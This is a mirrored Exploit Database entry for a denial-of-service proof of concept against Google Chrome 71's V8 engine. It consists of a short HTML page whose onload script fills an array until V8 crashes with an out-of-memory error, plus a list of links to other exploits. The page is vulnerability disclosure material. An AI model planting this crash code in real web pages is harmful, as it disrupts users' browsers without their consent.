Google Chrome V8 JavaScript Engine 71.0.3578.98 – Out-of-Memory in Invalid Array Length

Exploit Database
16 阅读

作者： Bogdan Kurinnoy

日期： 2019-01-16
类别：
- dos
平台：
- multiple
来源：https://www.exploit-db.com/exploits/46181/

<!--
# Exploit Title: Google Chrome 71.0.3578.98 V8 JavaScript Engine - Out-of-memory in invalid array length. Denial of Service (PoC)
# Google Dork: N/A
# Date: 2019-01-10
# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com)
# Vendor Homepage: https://www.google.com/
# Version: Google Chrome 71.0.3578.98, V8 version 7.3.0 (candidate)
# Tested on: Windows x64
# CVE : N/A

# Description:

# Fatal javascript OOM in invalid array length

# https://bugs.chromium.org/p/v8/issues/detail?id=8668
-->


<html>
<head>
<script>

function main() {

var ar = [];

	for(let i = 0; i < 0x20000000; ++i){
		ar[i]=i;
	} 
}
</script>
</head>
<body onload=main()></body>
</html>

last Exploits
Google Chrome V8 JavaScript Engine 71.0.3578.98 – Out-of-Memory in Invalid Array Length的更多信息

Apple iTunes 10.6.1.7 – ‘.m3u’ Walking Heap Buffer Overflow (PoC)：
TP-Link TL-WR740N Wireless Router – Denial of Service：
WebKit – ‘WebCore::InputType::element’ Use-After-Free (2)：
Linux Kernel 2.6.x – KVM ‘pit_ioport_read()’ Local Denial of Service：
VbsEdit 5.9.3 – ‘.smi’ Buffer Overflow (PoC)：
ProFTPd – ‘mod_sftp’ Integer Overflow Denial of Service (PoC)：
Apple WebKit – Negative-Size memmove in HTMLFormElement：
UltraVNC Launcher 1.2.2.4 – ‘Path’ Denial of Service (PoC)：